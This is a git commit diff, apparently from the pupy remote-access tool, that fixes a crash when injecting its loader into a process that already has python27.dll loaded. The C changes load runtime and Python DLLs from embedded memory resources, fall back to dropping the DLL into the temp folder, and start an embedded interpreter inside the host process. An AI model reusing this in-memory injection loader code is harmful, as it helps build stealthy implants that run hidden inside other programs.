fixed a bug where injecting into a process with python27.dll already loaded crashed

This commit is contained in:
n1nj4sec 2015-09-26 20:48:38 +02:00
parent 76b6cd05e4
commit bc4b324505
4 changed files with 80 additions and 37 deletions

View File

@ -1,3 +1,4 @@
//#define VERBOSE
#ifdef STANDALONE
# include <Python.h>
# include "Python-version.h"

View File

@ -64,6 +64,19 @@ int _load_python_FromFile(char *dllname)
return 1;
}
int _load_msvcr90(char *bytes)
{
HMODULE hmod;
ULONG_PTR cookie = 0;
cookie = _My_ActivateActCtx();
hmod = MyLoadLibrary("msvcr90.dll", bytes, NULL);
if (hmod == NULL) {
return 0;
}
_My_DeactivateActCtx(cookie);
return 1;
}
int _load_python(char *dllname, char *bytes)
{
int i;

View File

@ -6,6 +6,7 @@ del *.exp
del pupyx86.exe
del pupyx86.dll
IF [%1]==[quick] GOTO compilation
::First: generate resources :
copy resources\python27_x86.dll resources\python27.dll
%python_path% gen_library_compressed_string.py
@ -16,14 +17,14 @@ copy resources\msvcr90_x86.dll resources\msvcr90.dll
%python_path% gen_resource_header.py resources\msvcr90.dll
%python_path% gen_python_bootloader.py
%python_path% gen_resource_header.py resources\bootloader.pyc
::compile them to obj files :
:compilation
%cl_path% /c resources_library_compressed_string_txt.c
%cl_path% /c resources_bootloader_pyc.c
%cl_path% /c resources_python27_dll.c
%cl_path% /c resources_msvcr90_dll.c
::then compile
%cl_path% /c Python-dynload.c /IC:\Python27\include
%cl_path% /c MemoryModule.c
%cl_path% /c _memimporter.c /IC:\Python27\include

View File

@ -43,18 +43,31 @@ DWORD WINAPI mainThread(LPVOID lpArg)
char * ppath;
FILE * f;
char tmp_python_dll_path[MAX_PATH];
//char tmp_manifest_path[MAX_PATH];
char tmp_manifest_path[MAX_PATH];
char tmp_path[MAX_PATH];
ULONG_PTR cookie = 0;
/*
ACTCTX ctx;
BOOL activated;
HANDLE k32;
//HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
//BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
//void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
//BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
*/
PyGILState_STATE restore_state;
_load_python("msvcr90.dll", resources_msvcr90_dll_start); // needed for the python interpreter
if(!GetModuleHandle("msvcr90.dll")){
#ifndef QUIET
fprintf(stderr,"loading msvcr90.dll\n");
#endif
_load_msvcr90(resources_msvcr90_dll_start);
}
else{
#ifndef QUIET
fprintf(stderr,"msvcr90.dll already loaded\n");
#endif
}
GetTempPath(MAX_PATH, tmp_path);
//InitializeCriticalSection(&csInit);
@ -80,7 +93,7 @@ DWORD WINAPI mainThread(LPVOID lpArg)
fprintf(f,"%s",resource_python_manifest);
fclose(f);
#ifndef QUIET
printf("manifest written to %s\n",tmp_manifest_path);
fprintf(stderr,"manifest written to %s\n",tmp_manifest_path);
#endif
ctx.lpSource = tmp_manifest_path;
@ -98,31 +111,49 @@ DWORD WINAPI mainThread(LPVOID lpArg)
{
int res=0;
//activated = ActivateActCtx(MyActCtx, &actToken);
if(!_load_python("python27.dll", resources_python27_dll_start)){
//cookie=_My_ActivateActCtx();
if(GetModuleHandle("python27.dll")){
HANDLE hp;
#ifndef QUIET
printf("loading python27.dll from memory failed\n");
fprintf(stderr,"python27.dll is already loaded\n");
#endif
_load_python_FromFile("python27.dll"); // does not actually load a new python, but uses the handle of the already loaded one
}
else{
if(!_load_python("python27.dll", resources_python27_dll_start)){
#ifndef QUIET
fprintf(stderr,"loading python27.dll from memory failed\n");
#endif
//if loading from memory fail, we write dll on disk
sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path);
//if loading from memory fail, we write dll on disk
sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path);
f=fopen(tmp_python_dll_path,"wb");
res=fwrite(resources_python27_dll_start, sizeof(char), resources_python27_dll_size, f);
fclose(f);
f=fopen(tmp_python_dll_path,"wb");
res=fwrite(resources_python27_dll_start, sizeof(char), resources_python27_dll_size, f);
fclose(f);
if(!_load_python(tmp_python_dll_path, NULL)){
if(!_load_python("python27.dll", NULL)){ // try loading from system PATH
#ifndef QUIET
printf("could not load python dll\n");
#endif
if(!_load_python(tmp_python_dll_path, NULL)){
if(!_load_python("python27.dll", NULL)){ // try loading from system PATH
#ifndef QUIET
fprintf(stderr,"could not load python dll\n");
#endif
}
}
}
}
#ifndef QUIET
printf("python interpreter loaded\n");
fprintf(stderr,"python interpreter loaded\n");
#endif
}
//_My_DeactivateActCtx(cookie);
}
#ifndef QUIET
fprintf(stderr,"calling PyEval_InitThreads() ...\n");
#endif
PyEval_InitThreads();
#ifndef QUIET
fprintf(stderr,"PyEval_InitThreads() called\n");
#endif
if(!Py_IsInitialized()){
ppath = Py_GetPath();
strcpy(ppath, "\x00");
@ -131,21 +162,19 @@ DWORD WINAPI mainThread(LPVOID lpArg)
Py_Initialize();
#ifndef QUIET
printf("Py_Initialize()\n");
fprintf(stderr,"Py_Initialize()\n");
#endif
PySys_SetObject("frozen", PyBool_FromLong(1));
}
restore_state=PyGILState_Ensure();
PySys_SetObject("frozen", PyBool_FromLong(1));
init_memimporter();
#ifndef QUIET
printf("init_memimporter()\n");
fprintf(stderr,"init_memimporter()\n");
#endif
initpupy();
#ifndef QUIET
printf("initpupy()\n");
fprintf(stderr,"initpupy()\n");
#endif
//mod = PyImport_ImportModule("sys");
@ -153,9 +182,8 @@ DWORD WINAPI mainThread(LPVOID lpArg)
//MessageBoxA(0, "hey ! :D", "DLL Message", MB_OK | MB_ICONINFORMATION);
/* We execute then in the context of '__main__' */
PyEval_InitThreads();
#ifndef QUIET
printf("starting evaluating python code ...\n");
fprintf(stderr,"starting evaluating python code ...\n");
#endif
//PyRun_SimpleString("print 'ok from python'");
m = PyImport_AddModule("__main__");
@ -184,7 +212,7 @@ DWORD WINAPI mainThread(LPVOID lpArg)
/*
if (!DeactivateActCtx(0, actToken)){
#ifndef QUIET
printf("LOADER: Error deactivating context!\n!");
fprintf(stderr,"LOADER: Error deactivating context!\n!");
#endif
}
*/